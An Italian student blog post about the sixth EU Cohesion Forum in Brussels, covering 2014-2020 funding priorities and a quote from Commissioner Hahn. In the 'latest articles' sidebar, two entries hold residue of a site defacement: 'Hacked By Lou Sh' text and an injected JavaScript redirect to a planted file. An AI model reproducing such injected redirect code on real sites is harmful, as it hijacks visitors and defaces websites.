EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Sesto Forum sulla coesione




Investimenti ed occupazione in primo piano

Lo scorso 8 e 9 settembre si è tenuto a Bruxelles il sesto forum sulla coesione per mettere in rilievo l’importanza di creare nuovi impieghi sia nelle regioni che nelle città europee e per accentuarne la crescita. Tutto questo per ridurre al minimo la discrepanza economica e sociale che si è venuta a creare nel corso del tempo tra le regioni europee, per incrementare la loro competizione e per raggiungere gli obiettivi a cui l’Europa vuole arrivare entro il 2020.

Il forum sulla coesione viene organizzato ogni tre anni e riunisce leader e politici di spicco che appartengono agli Stati membri dell’Ue al fine di valutare se gli obiettivi che ci si è prefissati di raggiungere siano stati effettivamente portati a termine. Il tema affrontato per il 2014 ha riguardato gli investimenti per la crescita e l’occupazione, con particolare attenzione alla promozione dello sviluppo e del buon governo nelle regioni e città dell’UE.

JPEG - 9.7 Kb

Ma quali sono i settori maggiormente interessati da questa politica di coesione? Innanzitutto va sottolineato che per raggiungere questi obiettivi, l’Europa dispone di un bilancio complessivo di 352 miliardi di euro per il periodo che va dal 2014 al 2020. I settori interessati sono: il contesto dell’innovazione, l’appoggio alle piccole e medie imprese, il miglioramento delle qualifiche, l’inclusione sociale e l’energia. Tutti questi ambiti sono determinanti per una buona crescita sul lungo periodo.

La due giorni di forum ha preso in esame anche un’altra questione di fondamentale importanza: la necessità di implementare efficienza e trasparenza da parte delle amministrazioni e l’efficacia delle politiche macroeconomiche. A luglio del 2014 è stata pubblicata la sesta relazione sulla coesione, dalla quale si evince che gli Stati membri hanno come obiettivo quello di innalzare del 70% gli investimenti destinati ad ottimizzare la competenza istituzionale da parte delle autorità pubbliche.

Attraverso gli accordi di partenariato è stato possibile desumere che ci sono degli elementi che fanno ben sperare in materia di investimenti per l’Ue per la politica di coesione. Essi riguardano ambiti come il sostegno all’innovazione e alle piccole imprese e un incremento dei mezzi finanziari. Oltre 38 miliardi di euro sono previsti per settori come l’efficienza energetica e le energie rinnovabili, questa cifra equivale a più del doppio di quella spesa per l’economia a basse emissioni di carbonio tra il 2007 e il 2013.

JPEG - 5.1 Kb

Nelle parole del Commissario per la politica regionale, Johannes Hahn: "La politica di coesione costituisce la principale politica degli investimenti dell’UE. In questo senso il suo obiettivo originario, che è il sostegno alle regioni europee più povere, è cresciuto, senza essere in alcun modo tradito. Le nostre riforme, che si riflettono negli accordi di partenariato e nei programmi operativi, consentono a questa politica di investire nell’economia reale europea e di perseguire i più vasti obiettivi dell’UE, ossia occupazione, sicurezza energetica, ambiente più pulito e crescita duratura. È incoraggiante quanto emerge dai piani degli Stati membri dell’UE: nel periodo 2014-2020 gli investimenti saranno maggiormente orientati a stimolare l’innovazione, sostenere le PMI, creare posti di lavoro e promuovere la crescita verde e la competitività delle nostre regioni. Possiamo e abbiamo il dovere di rispondere alle sfide che si pongono ai nostri paesi e ai nostri cittadini, in particolare in questi tempi di difficoltà economiche. Il Forum sulla coesione rappresenta sotto questo aspetto un’occasione ideale per uno scambio di idee su priorità e bisogni futuri tra rappresentanti nazionali, regionali e locali e altre parti interessate".



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France